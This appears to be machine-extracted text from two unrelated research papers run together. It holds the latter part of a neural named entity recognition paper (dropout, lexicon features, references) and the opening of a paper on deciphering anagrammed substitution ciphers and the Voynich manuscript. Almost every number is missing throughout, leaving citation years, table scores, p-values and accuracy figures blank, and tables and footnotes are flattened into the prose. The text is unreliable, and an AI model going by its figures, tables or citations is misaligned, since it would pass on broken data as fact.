cabulary mismatch - in particular, google’s embed- dings were trained in a case-sensitive manner, and embeddings for many common punctuations and wilcoxon rank sum test, p < . to make a direct comparison to collobert et al. ( b), we do not exclude the conll- ner task test data from the word vector training data. while it is possible that this differ- ence could be responsible for the disparate performance of word vectors, the conll- training data comprises only k out of million words, or . % of the total data; in an un- supervised training scheme, the effects are likely negligible. symbols were not provided. to test these hypothe- ses, we performed experiments with new word em- beddings trained using glove and word vec, with vocabulary list and corpus similar to collobert et. al. ( b). as shown in table , our glove embeddings improved significantly over publicly available embeddings on conll- , and our word vec skip-gram embeddings improved signifi- cantly over google’s embeddings on ontonotes. due to time constraints we did not perform new hyper-parameter searches with any of the word em- beddings. as word embedding quality depends on hyper-parameter choice during their training (pen- nington et al., ), and also, in our ner neural network, hyper-parameter choice is likely sensitive to the type of word embeddings used, optimizing them all will likely produce better results and pro- vide a fairer comparison of word embedding quality. . effect of dropout table compares the result of various dropout val- ues for each dataset. the models are trained using only the training set for each dataset to isolate the effect of dropout on both dev and test sets. all other hyper-parameters and features remain the same as our best model in table . in both datasets and on both dev and test sets, dropout is essential for state of the art performance, and the improvement is statisti- cally significant . dropout is optimized on the dev set, as described in section . . hence, the chosen wilcoxon rank sum test, p < . wilcoxon rank sum test, p < . wilcoxon rank sum test, no dropout vs. best setting: p < . for the conll- test set, p < . for the ontonotes . test set, p < . for all others. l o c m is c o r g p e r n o t n e c a r d in a l d a t e m o n e y o r d in a l p e r c e n t q u a l it y t im e l o c f a c g p e n o r p o r g p e r s o n e v e n t l a n g l a w p r o d u c t w o r k n o n -n e loc misc org per any entity tag lexicon match conll ontonotes figure : fraction of named entities of each tag category matched completely by entries in each lexicon category of the senna/dbpedia combined lexicon. white = higher fraction. value may not be the best-performing in table . . lexicon features table shows that on the conll- dataset, us- ing features from both the senna lexicon and our proposed dbpedia lexicon provides a significant improvement and allows our model to clearly sur- pass the previous state of the art. unfortunately the difference is minuscule for ontonotes, most likely because our lexicon does not match dbpedia categories well. figure shows that on conll- , lexicon coverage is reasonable and matches the tags set for everything except the catch- all misc category. for example, loc entries in lexicon match mostly loc named entities and vice versa. however, on ontonotes, the matches are noisy and correspondence between lexicon match and tag category is quite ambiguous. for example, all lexicon categories have spurious matches in un- related named entities like cardinal, and loc, gpe, and language entities all get a lot of matches from the loc category in the lexicon. in addition, named entities in categories like norp, org, law, product receive little coverage. the lower cover- age, noise, and ambiguity all contribute to the dis- appointing performance. this suggests that the db- pedia lexicon construction method needs to be im- proved. a reasonable place to start would be the dbpedia category to ontonotes ne tag mappings. in order to isolate the contribution of each lexicon and matching method, we compare different sources and matching methods on a blstm-cnn model with randomly initialized word embeddings and no wilcoxon rank sum test, p < . . other features or sources of external knowledge. ta- ble shows the results. in this weakened model, both lexicons contribute significant improvements over the baseline. compared to the senna lexicon, our dbpe- dia lexicon is noisier but has broader coverage, which explains why when applying it using the same method as collobert et al. ( b), it performs worse on conll- but better on ontonotes – a dataset containing many more obscure named en- tities. however, we suspect that the method of col- lobert et al. ( b) is not noise resistant and there- fore unsuitable for our lexicon because it fails to dis- tinguish exact and partial matches and does not set a minimum length for partial matching. instead, when we apply our superior partial matching algo- rithm and bioes encoding with our dbpedia lex- icon, we gain a significant improvement, allow- ing our lexicon to perform similarly to the senna lexicon. unfortunately, as we could not reliably re- move partial entries from the senna lexicon, we were unable to investigate whether or not our lexi- con matching method would help in that lexicon. in addition, using both lexicons together as dis- tinct features provides a further improvement on conll- , which we suspect is because the lexi- wilcoxon rank sum test, p < . for senna-exact- bioes, p < . for all others. we achieve this by using bioes encoding and prioritizing exact matches over partial matches. matching only the first word of a long entry is not very useful; this is not a problem in the senna lexicon because % of its entries contain only tokens or less. wilcoxon rank sum test, p < . . wilcoxon rank sum test, p < . . lexicon matching encoding conll- ontonotes no lexicon - - . (± . ) . (± . ) senna exact yn . (± . ) . (± . ) exact bioes . (± . ) . (± . ) dbpedia exact yn . (± . ) . (± . ) exact bioes . (± . ) . (± . ) partial yn . (± . ) . (± . ) partial bioes . (± . ) . (± . ) collobert’s method . (± . ) . (± . ) both best combination . (± . ) . (± . ) table : comparison of lexicon and matching/encoding methods over the blstm-cnn model employing random embeddings and no other features. when using both lexicons, the best combination of matching and encoding is exact-bioes for senna and partial-bioes for dbpedia. note that the senna lexicon already contains “partial entries” so exact matching in that case is really just a more primitive form of partial matching. cons are complementary; the senna lexicon is rel- atively clean and tailored to newswire, whereas the dbpedia lexicon is noisier but has high coverage. . analysis of ontonotes performance table shows the per-genre breakdown of the ontonotes results. as expected, our model per- forms best on clean text like broadcast news (bn) and newswire (nw), and worst on noisy text like telephone conversation (tc) and web text (wb). our model also substantially improves over previous work on all genres except tc, where the small size of the training data likely hinders learning. finally, the performance characteristics of our model appear to be quite different than the previous crf mod- els (finkel and manning, ; durrett and klein, ), likely because we apply a completely differ- ent machine learning method. related research named entity recognition is a task with a long his- tory. in this section, we summarize the works we compare with and that influenced our approach. . named entity recognition most recent approaches to ner have been charac- terized by the use of crf, svm, and perceptron models, where performance is heavily dependent on feature engineering. ratinov and roth ( ) used non-local features, a gazetteer extracted from we downloaded their publicly released software and model to perform the per-genre evaluation. wikipedia, and brown-cluster-like word representa- tions, and achieved an f score of . on conll- . lin and wu ( ) surpassed them without using a gazetteer by instead using phrase features obtained by performing k-means clustering over a private database of search engine query logs. passos et al. ( ) obtained nearly the same performance using only public data by training phrase vectors in their lexicon-infused skip-gram model. in order to combat the problem of sparse features, suzuki et al. ( ) employed large-scale unlabelled data to per- form feature reduction and achieved an f score of . on conll- , which is the current state of the art for systems without external knowledge. training an ner system together with related tasks such as entity linking has recently been shown to improve the state of the art. durrett and klein ( ) combined coreference resolution, entity link- ing, and ner into a single crf model and added cross-task interaction factors. their system achieved state of the art results on the ontonotes dataset, but they did not evaluate on the conll- dataset due to lack of coreference annotations. luo et al. ( ) achieved state of the art results on conll- by training a joint model over the ner and entity linking tasks, the pair of tasks whose inter- dependencies contributed the most to the work of durrett and klein ( ). . ner with neural networks while many approaches involve crf models, there has also been a long history of research involving neural networks. early attempts were hindered by model bc bn mz nw tc wb test set size (# tokens) , , , , , , test set size (# entities) , , , , , finkel and manning ( ) . . . . . . durrett and klein ( ) . . . . . . blstm-cnn . . . . . . blstm-cnn + emb . . . . . . blstm-cnn + emb + lex . . . . . . table : per genre f scores on ontonotes. bc = broadcast conversation, bn = broadcast news, mz = magazine, nw = newswire, tc = telephone conversation, wb = blogs and newsgroups lack of computational power, scalable learning algo- rithms, and high quality word embeddings. petasis et al. ( ) used a feed-forward neural network with one hidden layer on ner and achieved state-of-the-art results on the muc dataset. their approach used only pos tag and gazetteer tags for each word, with no word embeddings. hammerton ( ) attempted ner with a single- direction lstm network and a combination of word vectors trained using self-organizing maps and con- text vectors obtained using principle component analysis. however, while our method optimizes log- likelihood and uses softmax, they used a different output encoding and optimized an unspecified ob- jective function. hammerton’s ( ) reported re- sults were only slightly above baseline models. much later, with the advent of neural word embeddings, collobert et al. ( b) presented senna, which employs a deep ffnn and word embeddings to achieve near state of the art results on pos tagging, chunking, ner, and srl. we build on their approach, sharing the word embeddings, fea- ture encoding method, and objective functions. recently, santos et al. ( ) presented their charwnn network, which augments the neural net- work of collobert et al. ( b) with character level cnns, and they reported improved performance on spanish and portuguese ner. we have successfully incorporated character-level cnns into our model. there have been various other similar architec- ture proposed for various sequential labeling nlp tasks. huang et al. ( ) used a blstm for the pos-tagging, chunking, and ner tasks, but they employed heavy feature engineering instead of using a cnn to automatically extract character- level features. labeau et al. ( ) used a brnn with character-level cnns to perform german pos- tagging; our model differs in that we use the more powerful lstm unit, which we found to perform better than rnns in preliminary experiments, and that we employ word embeddings, which is much more important in ner than in pos tagging. ling et al. ( ) used both word- and character-level blstms to establish the current state of the art for english pos tagging. while using blstms in- stead of cnns allows extraction of more sophisti- cated character-level features, we found in prelim- inary experiments that for ner it did not perform significantly better than cnns and was substantially more computationally expensive to train. conclusion we have shown that our neural network model, which incorporates a bidirectional lstm and a character-level cnn and which benefits from robust training through dropout, achieves state-of-the-art results in named entity recognition with little feature engineering. our model improves over previous best reported results on two major datasets for ner, sug- gesting that the model is capable of learning com- plex relationships from large amounts of data. preliminary evaluation of our partial matching lexicon algorithm suggests that performance could be further improved through more flexible appli- cation of existing lexicons. evaluation of existing word embeddings suggests that the domain of train- ing data is as important as the training algorithm. more effective construction and application of lexicons and word embeddings are areas that require more research. in the future, we would also like to extend our model to perform similar tasks such as extended tagset ner and entity linking. acknowledgments this research was supported by honda research in- stitute japan co., ltd. the authors would like to thank collobert et al. ( b) for releasing senna with its word vectors and lexicon, the torch frame- work contributors, and andrey karpathy for the ref- erence lstm implementation. references sören auer, christian bizer, georgi kobilarov, jens lehmann, richard cyganiak, and zachary ives. . dbpedia: a nucleus for a web of open data. in the semantic web, pages – . springer. phil blunsom, edward grefenstette, nal kalchbrenner, et al. . a convolutional neural network for mod- elling sentences. in proceedings of the nd annual meeting of the association for computational linguis- tics. association for computational linguistics. kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. . on the proper- ties of neural machine translation: encoder-decoder approaches. in proceedings of ssst- , eighth work- shop on syntax, semantics and structure in statistical translation, pages – . association for compu- tational linguistics. marc claesen, jaak simm, dusan popovic, yves moreau, and bart de moor. easy hyperparameter search using optunity. in proceedings of the interna- tional workshop on technical computing for machine learning and mathematical engineering. maurice clerc and james kennedy. . the particle swarm-explosion, stability, and convergence in a mul- tidimensional complex space. evolutionary computa- tion, ieee transactions on, ( ): – . ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proceed- ings of the th international conference on machine learning, pages – . acm. ronan collobert, koray kavukcuoglu, and clément farabet. a. torch : a matlab-like environment for machine learning. in proceedings of biglearn, nips workshop, number epfl-conf- . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. b. natural language processing (almost) from scratch. the journal of machine learning research, : – . greg durrett and dan klein. . a joint model for en- tity analysis: coreference, typing, and linking. trans- actions of the association for computational linguis- tics, : – . jenny rose finkel and christopher d manning. . joint parsing and named entity recognition. in pro- ceedings of human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – . association for computational linguistics. felix a gers, jürgen schmidhuber, and fred cummins. . learning to forget: continual prediction with lstm. neural computation, ( ): – . christoph goller and andreas kuchler. . learning task-dependent distributed representations by back- propagation through structure. in neural networks, ., ieee international conference on, volume , pages – . ieee. alan graves, abdel-rahman mohamed, and geoffrey hinton. . speech recognition with deep recurrent neural networks. in proceedings of the ieee in- ternational conference on acoustics, speech and sig- nal processing, pages – . james hammerton. . named entity recognition with long short-term memory. in proceedings of the seventh conference on natural language learning at hlt-naacl , pages – . association for computational linguistics. geoffrey hinton, nitish srivastava, and kevin swersky. . lecture e: rmsprop: divide the gradient by a running average of its recent magnitude. in neural networks for machine learning. http: //www.cs.toronto.edu/˜tijmen/csc / slides/lecture_slides_lec .pdf. eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of the human lan- guage technology conference of the naacl, com- panion volume: short papers, pages – . associ- ation for computational linguistics. zhiheng huang, wei xu, and kai yu. . bidi- rectional lstm-crf models for sequence tagging. corr, abs/ . . matthieu labeau, kevin löser, and alexandre allauzen. . non-lexical neural architecture for fine-grained pos tagging. in proceedings of the conference on empirical methods in natural language process- ing, pages – . association for computational linguistics. dekang lin and xiaoyun wu. . phrase clustering for discriminative learning. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natu- ral language processing of the afnlp, pages – . association for computational linguistics. http://www.cs.toronto.edu/~tijmen/csc /slides/lecture_slides_lec .pdf http://www.cs.toronto.edu/~tijmen/csc /slides/lecture_slides_lec .pdf http://www.cs.toronto.edu/~tijmen/csc /slides/lecture_slides_lec .pdf wang ling, chris dyer, alan w black, isabel trancoso, ramon fermandez, silvio amir, luis marujo, and tiago luis. . finding function in form: com- positional character models for open vocabulary word representation. in proceedings of the conference on empirical methods in natural language process- ing, pages – . association for computational linguistics. gang luo, xiaojiang huang, chin-yew lin, and za- iqing nie. . joint entity recognition and disam- biguation. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational lin- guistics. tomas mikolov, stefan kombrink, anoop deoras, lukar burget, and jan cernocky. . rnnlm-recurrent neural network language modeling toolkit. in pro- ceedings of the asru workshop, pages – . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. . distributed representa- tions of words and phrases and their compositionality. in proceedings of the twenty-seventh annual confer- ence on advances in neural information processing systems, pages – . yurii nesterov. . a method of solving a convex pro- gramming problem with convergence rate o( /k ). soviet mathematics doklady, ( ): – . alexandre passos, vineet kumar, and andrew mccal- lum. . lexicon infused phrase embeddings for named entity resolution. in proceedings of the eigh- teenth conference on computational natural lan- guage learning, pages – . association for com- putational linguistics. jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language processing, pages – . g petasis, s petridis, g paliouras, v karkaletsis, sj perantonis, and cd spyropoulos. . symbolic and neural learning for named-entity recognition. in proceedings of the symposium on computational in- telligence and learning, pages – . citeseer. vu pham, théodore bluche, christopher kermorvant, and jérôme louradour. . dropout improves re- current neural networks for handwriting recognition. in proceedings of the th international conference on frontiers in handwriting recognition, pages – . ieee. sameer pradhan, alessandro moschitti, nianwen xue, hwee tou ng, anders björkelund, olga uryupina, yuchen zhang, and zhi zhong. . towards robust linguistic analysis using ontonotes. in proceedings of the seventeenth conference on computational nat- ural language learning, pages – . association for computational linguistics. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in proceedings of the thirteenth conference on compu- tational natural language learning, pages – . association for computational linguistics. david rumelhart, geoffrey hinton, and ronald williams. . learning representations by back-propagating errors. nature, pages – . cıcero santos, victor guimaraes, rj niterói, and rio de janeiro. . boosting named entity recognition with neural character embeddings. in proceedings of the fifth named entities workshop, pages – . jun suzuki, hideki isozaki, and masaaki nagata. . learning condensed feature representations from large unsupervised data sets for supervised learning. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies: short papers, pages – . associa- tion for computational linguistics. erik f tjong kim sang and fien de meulder. . in- troduction to the conll- shared task: language- independent named entity recognition. in proceed- ings of the seventh conference on natural language learning at hlt-naacl , pages – . asso- ciation for computational linguistics. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computa- tional linguistics. matthew d. zeiler. . adadelta: an adaptive learning rate method. corr, abs/ . . decoding anagrammed texts written in an unknown language and script bradley hauer and grzegorz kondrak department of computing science university of alberta edmonton, canada {bmhauer,gkondrak}@ualberta.ca abstract algorithmic decipherment is a prime exam- ple of a truly unsupervised problem. the first step in the decipherment process is the iden- tification of the encrypted language. we pro- pose three methods for determining the source language of a document enciphered with a monoalphabetic substitution cipher. the best method achieves % accuracy on lan- guages. we then present an approach to de- coding anagrammed substitution ciphers, in which the letters within words have been ar- bitrarily transposed. it obtains the average de- cryption word accuracy of % on a set of ciphertexts in languages. finally, we report the results on the voynich manuscript, an un- solved fifteenth century cipher, which suggest hebrew as the language of the document. introduction the voynich manuscript is a medieval codex con- sisting of pages written in a unique script, which has been referred to as the world’s most important unsolved cipher (schmeh, ). the type of ci- pher that was used to generate the text is unknown; a number of theories have been proposed, includ- ing substitution and transposition ciphers, an abjad (a writing system in which vowels are not written), steganography, semi-random schemes, and an elab- orate hoax. however, the biggest obstacle to deci- the manuscript was radiocarbon dated to - ad in the arizona accelerator mass spectrometry labo- ratory (http://www.arizona.edu/crack-voynich-code, accessed nov. , ). phering the manuscript is the lack of knowledge of what language it represents. identification of the underlying language has been crucial for the decipherment of ancient scripts, in- cluding egyptian hieroglyphics (coptic), linear b (greek), and mayan glyphs (ch’olti’). on the other hand, the languages of many undeciphered scripts, such as linear a, the indus script, and the phaistos disc, remain unknown (robinson, ). even the order of characters within text may be in doubt; in egyptian hieroglyphic inscriptions, for instance, the symbols were sometimes rearranged within a word in order to create a more elegant inscription (singh, ). another complicating factor is the omission of vowels in some writing systems. applications of ciphertext language identification extend beyond secret ciphers and ancient scripts. nagy et al. ( ) frame optical character recogni- tion as a decipherment task. knight et al. ( ) note that for some languages, such as hindi, there exist many different and incompatible encoding schemes for digital storage of text; the task of an- alyzing such an arbitrary encoding scheme can be viewed as a decipherment of a substitution cipher in an unknown language. similarly, the unsupervised derivation of transliteration mappings between dif- ferent writing scripts lends itself to a cipher formu- lation (ravi and knight, ). the voynich manuscript is written in an unknown script that encodes an unknown language, which is the most challenging type of a decipherment prob- lem (robinson, , p. ). inspired by the mys- tery of both the voynich manuscript and the un- deciphered ancient scripts, we develop a series of transactions of the association for computational linguistics, vol. , pp. – , . action editor: regina barzilay. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. algorithms for the purpose of decrypting unknown alphabetic scripts representing unknown languages. we assume that symbols in scripts which contain no more than a few dozen unique characters roughly correspond to phonemes of a language, and model them as monoalphabetic substitution ciphers. we further allow that an unknown transposition scheme could have been applied to the enciphered text, resulting in arbitrary scrambling of letters within words (anagramming). finally, we consider the pos- sibility that the underlying script is an abjad, in which only consonants are explicitly represented. our decryption system is composed of three steps. the first task is to identify the language of a cipher- text, by comparing it to samples representing known languages. the second task is to map each symbol of the ciphertext to the corresponding letter in the identified language. the third task is to decode the resulting anagrams into readable text, which may in- volve the recovery of unwritten vowels. the paper is structured as follows. we discuss re- lated work in section . in section , we propose three methods for the source language identification of texts enciphered with a monoalphabetic substitu- tion cipher. in section , we present and evaluate our approach to the decryption of texts composed of en- ciphered anagrams. in section , we apply our new techniques to the voynich manuscript. section concludes the paper. related work in this section, we review particularly relevant prior work on the voynich manuscript, and on algorithmic decipherment in general. . voynich manuscript since the discovery of the voynich manuscript (henceforth referred to as the vms), there have been a number of decipherments claims. newbold and kent ( ) proposed an interpretation based on mi- croscopic details in the text, which was subsequently refuted by manly ( ). other claimed decipher- ments by feely ( ) and strong ( ) have also been refuted (tiltman, ). a detailed study of the manuscript by d’imperio ( ) details various other proposed solutions and the arguments against them. figure : a sample from the voynich manuscript. numerous languages have been proposed to un- derlie the vms. the properties and the dating of the manuscript imply latin and italian as potential can- didates. on the basis of the analysis of the character frequency distribution, jaskiewicz ( ) identifies five most probable languages, which include mol- davian and thai. reddy and knight ( ) discover an excellent match between the vms and quranic arabic in the distribution of word lengths, as well as a similarity to chinese pinyin in the predictability of letters given the preceding letter. it has been suggested previously that some ana- gramming scheme may alter the sequence order of characters within words in the vms. tiltman ( ) observes that each symbol behaves as if it had its own place in an “order of precedence” within words. rugg ( ) notes the apparent similarity of the vms to a text in which each word has been replaced by an alphabetically ordered anagram (alphagram). reddy and knight ( ) show that the letter se- quences are generally more predictable than in nat- ural languages. some researchers have argued that the vms may be an elaborate hoax created to only appear as a meaningful text. rugg ( ) suggests a tabular method, similar to the sixteenth century technique of the cardan grille, although recent dating of the manuscript to the fifteenth century provides evi- dence to the contrary. schinner ( ) uses analy- sis of random walk techniques and textual statistics to support the hoax hypothesis. on the other hand, landini ( ) identifies in the vms language-like statistical properties, such as zipf’s law, which were only discovered in the last century. similarly, mon- temurro and zanette ( ) use information theo- retic techniques to find long-range relationships be- tween words and sections of the manuscript, as well as between the text and the figures in the vms. . algorithmic decipherment a monoalphabetic substitution cipher is a well- known method of enciphering a plaintext by con- verting it into a ciphertext of the same length using a -to- mapping of symbols. knight et al. ( ) propose a method for deciphering substitution ci- phers which is based on viterbi decoding with map- ping probabilities computed with the expectation- maximization (em) algorithm. the method cor- rectly deciphers % of symbols in a -letter ci- phertext when a trigram character language model is used. they apply their method to ciphertext language identification using different language samples, and report successful outcomes on three ci- phers that represent english, spanish, and a spanish abjad, respectively. ravi and knight ( ) present a more complex but slower method for solving substitution ciphers, which incorporates constraints that model the -to- property of the key. the objective function is again the probability of the decipherment relative to an n- gram character language model. a solution is found by optimally solving an integer linear program. knight et al. ( ) describe a successful deci- pherment of an eighteenth century text known as the copiale cipher. language identification was the first step of the process. the em-based method of knight et al. ( ) identified german as the most likely candidate among over candidate charac- ter language models. the more accurate method of ravi and knight ( ) was presumably either too slow or too brittle for this purpose. the cipher was eventually broken using a combination of man- ual and algorithmic techniques. hauer et al. ( ) present an approach to solv- ing monoalphabetic substitution ciphers which is more accurate than other algorithms proposed for this task, including knight et al. ( ), ravi and knight ( ), and norvig ( ). we provide a detailed description of the method in section . . source language identification in this section, we propose and evaluate three meth- ods for determining the source language of a docu- ment enciphered with a monoalphabetic substitution cipher. we frame it as a classification task, with the classes corresponding to the candidate languages, which are represented by short sample texts. the methods are based on: . relative character frequencies, . patterns of repeated symbols within words, . the outcome of a trial decipherment. . character frequency an intuitive way of guessing the source language of a ciphertext is by character frequency analysis. the key observation is that the relative frequencies of symbols in the text are unchanged after encipher- ment with a -to- substitution cipher. the idea is to order the ciphertext symbols by frequency, normal- ize these frequencies to create a probability distri- bution, and choose the closest matching distribution from the set of candidate languages. more formally, let pt be a discrete probability distribution where pt (i) is the probability of a ran- domly selected symbol in a text t being the ith most frequent symbol. we define the distance between two texts u and v to be the bhattacharyya ( ) distance between the probability distributions pu and pv : d(u, v ) = − ln ∑ i √ pu(i) ·pv (i) the advantages of this distance metric include its symmetry, and the ability to account for events that have a zero probability (in this case, due to different alphabet sizes). the language of the closest sample text to the ciphertext is considered to be the most likely source language. this method is not only fast but also robust against letter reordering and the lack of word boundaries. . decomposition pattern frequency our second method expands on the character fre- quency method by incorporating the notion of de- composition patterns. this method uses multiple oc- currences of individual symbols within a word as a clue to the language of the ciphertext. for example, the word seems contains two instances of ‘s’ and ‘e’, and one instance of ‘m’. we are interested in captur- ing the relative frequency of such patterns in texts, independent of the symbols used. formally, we define a function f that maps a word to an ordered n-tuple (t , t , . . . tn), where ti ≥ tj if i < j. each ti is the number of oc- currences of the ith most frequent character in the word. for example, f(seems) = ( , , ), while f(beams) = ( , , , , ). we refer to the resulting tuple as the decomposition pattern of the word. the decomposition pattern is unaffected by monoalpha- betic letter substitution or anagramming. as with the character frequency method, we define the distance between two texts as the bhattacharyya distance be- tween their decomposition pattern distributions, and classify the language of a ciphertext as the language of the nearest sample text. it is worth noting that this method requires word separators to be preserved in the ciphertext. in fact, the effectiveness of the method comes partly from capturing the distribution of word lengths in a text. on the other hand, the decomposition patterns are independent of the ordering of characters within words. we will take advantage of this property in section . . trial decipherment the final method that we present involves decipher- ing the document in question into each candidate language. the decipherment is performed with a fast greedy-swap algorithm, which is related to the algorithms of ravi and knight ( ) and norvig ( ). it attempts to find the key that maximizes the probability of the decipherment according to a bi- gram character language model derived from a sam- ple document in a given language. the decipher- ment with the highest probability indicates the most likely plaintext language of the document. the greedy-swap algorithm is shown in figure . the initial key is created by pairing the ciphertext and plaintext symbols in the order of decreasing fre- quency, with null symbols appended to the shorter of the two alphabets. the algorithm repeatedly at- tempts to improve the current key k by considering the “best” swaps of ciphertext symbol pairs within the key (if the key is viewed as a permutation of the alphabet, such a swap is a transposition). the best swaps are defined as those that involve a sym- bol occurring among the least common bigrams in the decipherment induced by the current key. if any such swap yields a more probable decipherment, : kmax ← initialkey : for m iterations do : k ← kmax : s ← best swaps for k : for each {c , c }∈s do : k′ ← k(c ↔c ) : if p(k′) > p(kmax) then kmax ← k′ : if kmax = k then return kmax : return kmax figure : greedy-swap decipherment algorithm. it is incorporated in the current key; otherwise, the algorithm terminates. the total number of iterations is bounded by m, which is set to times the size of the alphabet. after the initial run, the algorithm is restarted times with a randomly generated ini- tial key, which often results in a better decipherment. all parameters were established on a development set. . evaluation we now directly evaluate the three methods de- scribed above by applying them to a set of cipher- texts from different languages. we adapted the dataset created by emerson et al. ( ) from the text of the universal declaration of human rights (udhr) in languages. the average length of the texts is words and characters. we divided the text in each language into % train- ing, % development, and % test. the training part was used to derive character bigram models for each language. the development and test parts were separately enciphered with a random substitution ci- pher. table shows the results of the language identifi- cation methods on both the development and the test set. we report the average top- accuracy on the task of identifying the source language of enciphered test samples. the differences between methods are statistically significant according to mcnemar’s test with p < . . the random baseline of . % in- dicates the difficulty of the task. the “oracle” de- cipherment assumes a perfect decipherment of the text, which effectively reduces the task to standard eight languages from the original set were excluded be- cause of formatting issues. method dev test random selection . . jaskiewicz ( ) . . character frequency . . decomposition pattern . . trial decipherment . . oracle decipherment . . table : language identification accuracy (in % correct) on ciphers representing languages. language identification. all three of our methods perform well, with the accuracy gains reflecting their increasing complex- ity. between the two character frequency methods, our approach based on bhattacharyya distance is significantly more accurate than the method of jask- iewicz ( ), which uses a specially-designed dis- tribution distance function. the decomposition pat- tern method makes many fewer errors, with the cor- rect language ranked second in roughly half of those cases. trial decipherment yields the best results, which are close to the upper bound for the character bigram probability approach to language identifica- tion. the average decipherment error rate into the correct language is only . %. in out of identi- fication errors made on the test set, the error rate is above the average; the other errors involve closely related languages, such as serbian and bosnian. the trial decipherment approach is much slower than the frequency distribution methods, requiring roughly one hour of cpu time in order to classify each ciphertext. more complex decipherment algo- rithms are even slower, which precludes their appli- cation to this test set. our re-implementations of the dynamic programming algorithm of knight et al. ( ), and the integer programming solver of ravi and knight ( ) average and seconds of cpu time, respectively, to solve a single charac- ter cipher, compared to . seconds with our greedy- swap method. the dynamic programming algorithm improves decipherment accuracy over our method by only % on a benchmark set of ciphers of characters. we conclude that our greedy-swap al- gorithm strikes the right balance between accuracy and speed required for the task of cipher language identification. anagram decryption in this section, we address the challenging task of deciphering a text in an unknown language written using an unknown script, and in which the letters within words have been randomly scrambled. the task is designed to emulate the decipherment prob- lem posed by the vms, with the assumption that its unusual ordering of characters within words re- flects some kind of a transposition cipher. we re- strict the source language to be one of the candi- date languages for which we have sample texts; we model an unknown script with a substitution cipher; and we impose no constraints on the letter transposi- tion method. the encipherment process is illustrated in figure . the goal in this instance is to recover the plaintext in (a) given the ciphertext in (c) without the knowledge of the plaintext language. we also con- sider an additional encipherment step that removes all vowels from the plaintext. our solution is composed of a sequence of three modules that address the following tasks: language identification, script decipherment, and anagram de- coding. for the first task we use the decomposition pattern frequency method described in section . , which is applicable to anagrammed ciphers. after identifying the plaintext language, we proceed to re- verse the substitution cipher using a heuristic search algorithm guided by a combination of word and character language models. finally, we unscramble the anagrammed words into readable text by fram- ing the decoding as a tagging task, which is effi- ciently solved with a viterbi decoder. our modular approach makes it easy to perform different levels of analysis on unsolved ciphers. . script decipherment for the decipherment step, we adapt the state-of-the- art solver of hauer et al. ( ). in this section, we describe the three main components of the solver: key scoring, key mutation, and tree search. this is followed by the summary of modifications that make the method work on anagrams. the scoring component evaluates the fitness of each key by computing the smoothed probability of the resulting decipherment with both character- level and word-level language models. the word- level models promote decipherments that contain (a) organized compositions through improvisational music into genres (b) fyovicstu dfnrfecpcfie pbyfzob cnryfgcevpcfivm nzecd cipf otiyte (c) otvfusyci cpifenfercfd bopbfzy fgyiemcpfcvrcnv nczed fpic etotyi (d) adegiknor ciimnooopsst ghhortu aaiiilmnooprstv cimsu inot eegnrs (e) adegiknor compositions through aaiiilmnooprstv music into greens figure : an example of the encryption and decryption process: (a) plaintext; (b) after applying a substitution cipher; (c) ciphertext after random anagramming; (d) after substitution decipherment (in the alphagram representation); (e) final decipherment after anagram decoding (errors are underlined). in-vocabulary words and high-probability word n- grams, while the character level models allow for the incorporation of out-of-vocabulary words. the key mutation component crucially depends on the notion of pattern equivalence between char- acter strings. two strings are pattern-equivalent if they share the same pattern of repeated letters. for example, mzxcx is pattern-equivalent with there and bases. but not with otter. for each word uni- gram, bigram, and trigram in the ciphertext, a list of the most frequent pattern equivalent n-grams from the training corpus is compiled. the solver repeat- edly attempts to improve the current key through a series of transpositions, so that a given cipher n- gram maps to a pattern-equivalent n-gram from the provided language sample. the number of substi- tutions for a given n-gram is limited to the k most promising candidates, where k is a parameter opti- mized on a development set. the key mutation procedure generates a tree structure, which is searched for the best-scoring de- cipherment using a version of beam search. the root of the tree contains the initial key, which is gener- ated according to simple frequency analysis (i.e., by mapping the n-th most common ciphertext character to the n-th most common character in the corpus). new tree leaves are spawned by modifying the keys of current leaves, while ensuring that each node in the tree has a unique key. at the end of computa- tion, the key with the highest score is returned as the solution. in our anagram adaptation, we relax the definition of pattern equivalence to include strings that have the same decomposition pattern, as defined in sec- tion . . under the new definition, the order of the letters within a word has no effect on pattern equiv- alence. for example, mzxcx is equivalent not only with there and bases, but also with three and otter, because all these words map to the ( , , , ) pat- tern. internally, we represent all words as alpha- grams, in which letters are reshuffled into the alpha- betical order (figure d). in order to handle the in- creased ambiguity, we use a letter-frequency heuris- tic to select the most likely mapping of letters within an n-gram. the trigram language models over both words and characters are derived by converting each word in the training corpus into its alphagram. on a benchmark set of ciphers of length , the av- erage error rate of the modified solver is . %, with only a small increase in time and space usage. . anagram decoder the output of the script decipherment step is gener- ally unreadable (see figure d). the words might be composed of the right letters but their order is unlikely to be correct. we proceed to decode the sequence of anagrams by framing it as a simple hid- den markov model, in which the hidden states corre- spond to plaintext words, and the observed sequence is composed of their anagrams. without loss of gen- erality, we convert anagrams into alphagrams, so that the emission probabilities are always equal to . any alphagrams that correspond to unseen words are replaced with a single ‘unknown’ type. we then use a modified viterbi decoder to determine the most likely word sequence according to a word trigram language model, which is derived from the train- ing corpus, and smoothed using deleted interpola- tion (jelinek and mercer, ). . vowel recovery many writing systems, including arabic and he- brew, are abjads that do not explicitly represent vow- els. reddy and knight ( ) provide evidence that the vms may encode an abjad. the removal of vowels represents a substantial loss of information, and appears to dramatically increase the difficulty of solving a cipher. in order to apply our system to abjads, we re- move all vowels in the corpora prior to deriving the language models used by the script decipherment step. we assume the ability to partition the plaintext symbols into disjoint sets of vowels and consonants for each candidate language. the anagram decoder is trained to recover complete in-vocabulary words from 